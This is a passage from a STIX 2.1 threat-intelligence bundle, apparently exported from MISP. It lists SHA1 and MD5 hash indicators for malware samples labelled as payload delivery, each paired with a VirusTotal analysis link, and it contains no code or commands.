"value": "https://www.virustotal.com/file/c8dee4c2212c7bf8eb9cd7635ff42526b17340fb198a801cdaa8d4ef72a3c1db/analysis/1444063598/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81a4-15fc-48fd-b2dc-432a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:00.000Z",
|
|
"modified": "2017-03-29T09:43:00.000Z",
|
|
"description": "sample - Xchecked via VT: 20b2c347268546d317711aa693d078c0dcac247e486e3b87e45b099fabdff607",
|
|
"pattern": "[file:hashes.SHA1 = 'cb8a1805726c5da18e8dc91367d35bb5b94a1b05']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:00Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81a5-6dd0-468f-9bf4-41a602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:01.000Z",
|
|
"modified": "2017-03-29T09:43:01.000Z",
|
|
"description": "sample - Xchecked via VT: 20b2c347268546d317711aa693d078c0dcac247e486e3b87e45b099fabdff607",
|
|
"pattern": "[file:hashes.MD5 = 'fd2b469d0f037eb7ceb10e993088feca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:01Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81a6-3d78-4e63-be62-4b1b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:02.000Z",
|
|
"modified": "2017-03-29T09:43:02.000Z",
|
|
"first_observed": "2017-03-29T09:43:02Z",
|
|
"last_observed": "2017-03-29T09:43:02Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81a6-3d78-4e63-be62-4b1b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81a6-3d78-4e63-be62-4b1b02de0b81",
|
|
"value": "https://www.virustotal.com/file/20b2c347268546d317711aa693d078c0dcac247e486e3b87e45b099fabdff607/analysis/1432201680/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81a7-d958-4aef-ae76-4cb602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:03.000Z",
|
|
"modified": "2017-03-29T09:43:03.000Z",
|
|
"description": "sample - Xchecked via VT: 2c5871fb46e6fbf95266830ba7b4923449d0bc99a4efd7586ff5556ca049ea1c",
|
|
"pattern": "[file:hashes.SHA1 = '3af9ffe85b6c3d79e750112342d9dcae2c5faa36']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:03Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81a8-b3bc-45d4-bf68-4d6202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:04.000Z",
|
|
"modified": "2017-03-29T09:43:04.000Z",
|
|
"description": "sample - Xchecked via VT: 2c5871fb46e6fbf95266830ba7b4923449d0bc99a4efd7586ff5556ca049ea1c",
|
|
"pattern": "[file:hashes.MD5 = 'cfd67bcc60d91dc087c5451983247cd5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:04Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81a9-2e2c-448d-bf07-484602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:05.000Z",
|
|
"modified": "2017-03-29T09:43:05.000Z",
|
|
"first_observed": "2017-03-29T09:43:05Z",
|
|
"last_observed": "2017-03-29T09:43:05Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81a9-2e2c-448d-bf07-484602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81a9-2e2c-448d-bf07-484602de0b81",
|
|
"value": "https://www.virustotal.com/file/2c5871fb46e6fbf95266830ba7b4923449d0bc99a4efd7586ff5556ca049ea1c/analysis/1432179138/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81a9-3700-4779-9af5-405a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:05.000Z",
|
|
"modified": "2017-03-29T09:43:05.000Z",
|
|
"description": "sample - Xchecked via VT: 53e4330ba988627e5f1f5544f23fae1c66c0f2d714a922b1130a1c9dc2efeda5",
|
|
"pattern": "[file:hashes.SHA1 = '3843a47a0e634a13e3a2ddb629bc38d7c7b777d2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:05Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81aa-7efc-42d6-a870-476502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:06.000Z",
|
|
"modified": "2017-03-29T09:43:06.000Z",
|
|
"description": "sample - Xchecked via VT: 53e4330ba988627e5f1f5544f23fae1c66c0f2d714a922b1130a1c9dc2efeda5",
|
|
"pattern": "[file:hashes.MD5 = 'ba021ad7e608021d3527b84a637cb8ef']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:06Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81ab-18d8-4261-bea6-44c902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:07.000Z",
|
|
"modified": "2017-03-29T09:43:07.000Z",
|
|
"first_observed": "2017-03-29T09:43:07Z",
|
|
"last_observed": "2017-03-29T09:43:07Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81ab-18d8-4261-bea6-44c902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81ab-18d8-4261-bea6-44c902de0b81",
|
|
"value": "https://www.virustotal.com/file/53e4330ba988627e5f1f5544f23fae1c66c0f2d714a922b1130a1c9dc2efeda5/analysis/1432584675/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81ac-9880-4af1-b4ff-403a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:08.000Z",
|
|
"modified": "2017-03-29T09:43:08.000Z",
|
|
"description": "sample - Xchecked via VT: 3977472c733eafb7e71f8fd6fece5d2cfc849ec88e9d6942082531f3f88818b2",
|
|
"pattern": "[file:hashes.SHA1 = '2ba61373805dde69862d66f65102f3df9fa1d385']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81ad-9d3c-4395-9967-4bae02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:09.000Z",
|
|
"modified": "2017-03-29T09:43:09.000Z",
|
|
"description": "sample - Xchecked via VT: 3977472c733eafb7e71f8fd6fece5d2cfc849ec88e9d6942082531f3f88818b2",
|
|
"pattern": "[file:hashes.MD5 = 'd5c892fe8dc051ba64efc409b43920db']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81ae-c66c-4bc4-b3e7-496b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:10.000Z",
|
|
"modified": "2017-03-29T09:43:10.000Z",
|
|
"first_observed": "2017-03-29T09:43:10Z",
|
|
"last_observed": "2017-03-29T09:43:10Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81ae-c66c-4bc4-b3e7-496b02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81ae-c66c-4bc4-b3e7-496b02de0b81",
|
|
"value": "https://www.virustotal.com/file/3977472c733eafb7e71f8fd6fece5d2cfc849ec88e9d6942082531f3f88818b2/analysis/1430686779/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81af-34e8-450f-b196-462e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:11.000Z",
|
|
"modified": "2017-03-29T09:43:11.000Z",
|
|
"description": "sample - Xchecked via VT: 6b8b394add913d3c410787f0c711217fec60a917872465de04290a8003b73535",
|
|
"pattern": "[file:hashes.SHA1 = 'b5c98722363d80631764b134cda03c40700806ba']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81b0-3bd4-4f83-b39f-47a702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:12.000Z",
|
|
"modified": "2017-03-29T09:43:12.000Z",
|
|
"description": "sample - Xchecked via VT: 6b8b394add913d3c410787f0c711217fec60a917872465de04290a8003b73535",
|
|
"pattern": "[file:hashes.MD5 = '97f67299c2d29fb800c92d9dc9c95301']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81b1-00e8-457c-9fc1-455f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:13.000Z",
|
|
"modified": "2017-03-29T09:43:13.000Z",
|
|
"first_observed": "2017-03-29T09:43:13Z",
|
|
"last_observed": "2017-03-29T09:43:13Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81b1-00e8-457c-9fc1-455f02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81b1-00e8-457c-9fc1-455f02de0b81",
|
|
"value": "https://www.virustotal.com/file/6b8b394add913d3c410787f0c711217fec60a917872465de04290a8003b73535/analysis/1482682871/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81b2-4c88-48a9-b7f5-479802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:14.000Z",
|
|
"modified": "2017-03-29T09:43:14.000Z",
|
|
"description": "sample - Xchecked via VT: 54e54c459dbe3224d3f4947b30f20b365224552afac4bd45ddadfacee9a7cbe2",
|
|
"pattern": "[file:hashes.SHA1 = '1e8e62f2771bc193b803992f2086136762d74237']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81b3-b908-4eea-a4aa-40a302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:15.000Z",
|
|
"modified": "2017-03-29T09:43:15.000Z",
|
|
"description": "sample - Xchecked via VT: 54e54c459dbe3224d3f4947b30f20b365224552afac4bd45ddadfacee9a7cbe2",
|
|
"pattern": "[file:hashes.MD5 = 'ad92b2547a53356e450ae3d978cfa808']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81b4-f308-45b4-b283-471802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:16.000Z",
|
|
"modified": "2017-03-29T09:43:16.000Z",
|
|
"first_observed": "2017-03-29T09:43:16Z",
|
|
"last_observed": "2017-03-29T09:43:16Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81b4-f308-45b4-b283-471802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81b4-f308-45b4-b283-471802de0b81",
|
|
"value": "https://www.virustotal.com/file/54e54c459dbe3224d3f4947b30f20b365224552afac4bd45ddadfacee9a7cbe2/analysis/1482159354/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81b5-9534-4fb9-aec5-4a3b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:17.000Z",
|
|
"modified": "2017-03-29T09:43:17.000Z",
|
|
"description": "sample - Xchecked via VT: 49b2fae0ae4d9cf71c2766a0d965d8a50bacd8c522eb45656b8b5f6a1c7c8f51",
|
|
"pattern": "[file:hashes.SHA1 = '0e86668b5bdea312fc41084c66ec5c4c422c424c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81b6-cc5c-4ee3-8427-477802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:18.000Z",
|
|
"modified": "2017-03-29T09:43:18.000Z",
|
|
"description": "sample - Xchecked via VT: 49b2fae0ae4d9cf71c2766a0d965d8a50bacd8c522eb45656b8b5f6a1c7c8f51",
|
|
"pattern": "[file:hashes.MD5 = '79a264bda00f5570c54d1f67f06792db']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81b7-4ab0-47ae-b479-476202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:19.000Z",
|
|
"modified": "2017-03-29T09:43:19.000Z",
|
|
"first_observed": "2017-03-29T09:43:19Z",
|
|
"last_observed": "2017-03-29T09:43:19Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81b7-4ab0-47ae-b479-476202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81b7-4ab0-47ae-b479-476202de0b81",
|
|
"value": "https://www.virustotal.com/file/49b2fae0ae4d9cf71c2766a0d965d8a50bacd8c522eb45656b8b5f6a1c7c8f51/analysis/1424088922/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81b8-36f8-4438-854a-471402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:20.000Z",
|
|
"modified": "2017-03-29T09:43:20.000Z",
|
|
"description": "sample - Xchecked via VT: 0353e9168983735e8efd2d53b4c498b7810f49e67169e33eb42ed2ef8d3a13eb",
|
|
"pattern": "[file:hashes.SHA1 = 'd8e68588aa11ea8031376e6627a4f660c39fd290']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:20Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81b9-94b4-4790-82fc-454b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:21.000Z",
|
|
"modified": "2017-03-29T09:43:21.000Z",
|
|
"description": "sample - Xchecked via VT: 0353e9168983735e8efd2d53b4c498b7810f49e67169e33eb42ed2ef8d3a13eb",
|
|
"pattern": "[file:hashes.MD5 = '0ecff809bdf3034700f272a39d3984b1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81ba-bb74-453a-8623-491902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:22.000Z",
|
|
"modified": "2017-03-29T09:43:22.000Z",
|
|
"first_observed": "2017-03-29T09:43:22Z",
|
|
"last_observed": "2017-03-29T09:43:22Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81ba-bb74-453a-8623-491902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81ba-bb74-453a-8623-491902de0b81",
|
|
"value": "https://www.virustotal.com/file/0353e9168983735e8efd2d53b4c498b7810f49e67169e33eb42ed2ef8d3a13eb/analysis/1445738830/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81bb-8230-4c39-a44c-47cb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:23.000Z",
|
|
"modified": "2017-03-29T09:43:23.000Z",
|
|
"description": "sample - Xchecked via VT: 813fdde0b998bda3247eadab873677972681274b4a9905030bf8d76727d57a6c",
|
|
"pattern": "[file:hashes.SHA1 = '8ff4aacf63a7ec51d392a42fba73b4ed67949982']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:23Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81bb-26bc-46b9-b5b8-477c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:23.000Z",
|
|
"modified": "2017-03-29T09:43:23.000Z",
|
|
"description": "sample - Xchecked via VT: 813fdde0b998bda3247eadab873677972681274b4a9905030bf8d76727d57a6c",
|
|
"pattern": "[file:hashes.MD5 = '39a17df17adcb566cc9d9b89a19c8cc4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:23Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81bc-f564-4a74-8b1d-4d5702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:24.000Z",
|
|
"modified": "2017-03-29T09:43:24.000Z",
|
|
"first_observed": "2017-03-29T09:43:24Z",
|
|
"last_observed": "2017-03-29T09:43:24Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81bc-f564-4a74-8b1d-4d5702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db81bc-f564-4a74-8b1d-4d5702de0b81",
|
|
"value": "https://www.virustotal.com/file/813fdde0b998bda3247eadab873677972681274b4a9905030bf8d76727d57a6c/analysis/1482837583/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81bd-3488-44f0-8363-4f6f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:25.000Z",
|
|
"modified": "2017-03-29T09:43:25.000Z",
|
|
"description": "sample - Xchecked via VT: 32b7a4f26eb3e2f44eeb82b95f9971572aeb82f1e218bbad39b2a8238d1448bd",
|
|
"pattern": "[file:hashes.SHA1 = 'f70df83f58105781529a37b8d6dd9041d54b1423']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db81be-75cc-4f4e-bb10-41ba02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:26.000Z",
|
|
"modified": "2017-03-29T09:43:26.000Z",
|
|
"description": "sample - Xchecked via VT: 32b7a4f26eb3e2f44eeb82b95f9971572aeb82f1e218bbad39b2a8238d1448bd",
|
|
"pattern": "[file:hashes.MD5 = '79d4a8f62769c3f165b1e1bc7ee3b9db']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:43:26Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db81bf-43b8-47fe-b8ef-44b702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:43:27.000Z",
|
|
"modified": "2017-03-29T09:43:27.000Z",
|
|
"first_observed": "2017-03-29T09:43:27Z",
|
|
"last_observed": "2017-03-29T09:43:27Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db81bf-43b8-47fe-b8ef-44b702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
